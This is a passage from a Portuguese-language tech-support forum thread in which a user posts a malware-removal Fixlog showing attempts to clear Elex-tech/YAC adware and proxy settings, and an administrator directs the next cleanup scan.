"C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc2.exe " => não encontrado (a).
"C:\Program Files (x86)\Elex-tech\YAC" pasta mover:
Não pode ser movido "C:\Program Files (x86)\Elex-tech\YAC" => Agendado para ser movido na reinicialização.
"C:\Program Files (x86)\Elex-tech" pasta mover:
Não pode ser movido "C:\Program Files (x86)\Elex-tech" => Agendado para ser movido na reinicialização.
HKLM\System\CurrentControlSet\Control\Session Manager\SubSystems\\Windows No ZeroAccess entry found.
Ponto de Restauração criado com sucesso.
========= RemoveProxy: =========
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valor removido (a) com sucesso.
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valor removido (a) com sucesso.
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valor removido (a) com sucesso.
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valor removido (a) com sucesso.
========= Fim de RemoveProxy: =========
C:\Windows\System32\Drivers\etc\hosts => movido com sucesso
Hosts restaurado com sucesso.
=========== EmptyTemp: ==========
BITS transfer queue => 3321812 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 11692274 B
Java, Flash, Steam htmlcache => 1227 B
Windows/system/drivers => 8992 B
Edge => 107055273 B
Chrome => 0 B
Firefox => 17554621 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 128 B
systemprofile32 => 0 B
LocalService => 0 B
NetworkService => 4192 B
ADEMIR MONTEIRO => 210009 B
RecycleBin => 43861 B
EmptyTemp: => 133.4 MB de dados temporários Removidos.
================================
Resultado dos arquivos que foram agendados para serem movidos (Modo de Inicialização: Normal) (Data&Hora: 09-05-2017 19:07:05)
C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Mozilla\Firefox\Profiles\w6trckk7.default\user.js => foi movido com sucesso
C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Mozilla\Firefox\Profiles\w6trckk7.default\user.js => foi movido com sucesso
C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Elex-tech => movido com sucesso
"C:\Program Files (x86)\Elex-tech" => Não pode ser movido
"C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe" => Não pode ser movido
"C:\Program Files (x86)\Elex-tech\YAC" => Não pode ser movido
"C:\Program Files (x86)\Elex-tech" => Não pode ser movido
Resultado dos registros marcados para excluir será exibido após a reinicialização:
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990} => chave Não pode ser removido, chave pode estar protegida
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{6F2E5825-C576-4536-A9BE-FF7181495112} => chave Não pode ser removido, chave pode estar protegida
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{BD62CFA9-F375-461C-A90E-AB90B578F202} => chave Não pode ser removido, chave pode estar protegida
HKLM\System\CurrentControlSet\Services\iSafeService => chave Não pode ser removido, chave pode estar protegida
HKLM\System\CurrentControlSet\Services\iSafeKrnl => chave Não pode ser removido, chave pode estar protegida
HKLM\System\CurrentControlSet\Services\iSafeKrnlKit => chave Não pode ser removido, chave pode estar protegida
HKLM\System\CurrentControlSet\Services\iSafeKrnlR3 => chave Não pode ser removido, chave pode estar protegida
HKLM\System\CurrentControlSet\Services\iSafeKrnlBoot => chave Não pode ser removido, chave pode estar protegida
HKLM\System\CurrentControlSet\Services\iSafeNetFilter => chave Não pode ser removido, chave pode estar protegida
==== Fim de Fixlog 19:08:03 ====
Ademir- Membro
- Mensagens : 63
Reputação : 4
Data de inscrição : 23/04/2017
Re: Firefox Muda Configuração Inicial de Repente
por joram Ter 09 maio 2017, 21:09
/_ Boa Noite! Ademir _\
Siga agora com a ZA-Scan,em seu script,que alterei removendo uma linha de perfil ao Firefox.
Ao concluir,poste o relatório! ( C:\zoek-results.txt )
[Abs]
Siga agora com a ZA-Scan,em seu script,que alterei removendo uma linha de perfil ao Firefox.
Ao concluir,poste o relatório! ( C:\zoek-results.txt )
[Abs]
joram- Administrador
- Mensagens : 4162
Reputação : 471
Data de inscrição : 26/01/2014
Localização : Rio de Janeiro
Re: Firefox Muda Configuração Inicial de Repente
por Ademir Qua 10 maio 2017, 08:51
Bom dia
Joram, abri o ZA-Scan mas ele não sai desta janela (fig). Executei-o ontem à noite, logo depois de postar o relatório Fixlog, deixei o computador ligado até agora, e não aconteceu nada. Essa demora não pode ser normal. E também não consigo fechá-lo - ele abre a mesma caixa. O que está ocorrendo?
Abç
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
Joram, abri o ZA-Scan mas ele não sai desta janela (fig). Executei-o ontem à noite, logo depois de postar o relatório Fixlog, deixei o computador ligado até agora, e não aconteceu nada. Essa demora não pode ser normal. E também não consigo fechá-lo - ele abre a mesma caixa. O que está ocorrendo?
Abç
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
Ademir- Membro
- Mensagens : 63
Reputação : 4
Data de inscrição : 23/04/2017
Página 3 de 5 • 1, 2, 3, 4, 5
Tópicos semelhantes» A página inicial não muda nos navegadores
» Retirar o Navegaki da Página Inicial do Mozilla Firefox.
» Curta os trailers dos filmes que você mais gosta
» Meu notebook ficou sem som de repente...
» Cracker invade Vírtua e muda DNS do Bradesco
» Retirar o Navegaki da Página Inicial do Mozilla Firefox.
» Curta os trailers dos filmes que você mais gosta
» Meu notebook ficou sem som de repente...
» Cracker invade Vírtua e muda DNS do Bradesco
Página 3 de 5
Permissões neste sub-fórum
Não podes responder a tópicos|
|
|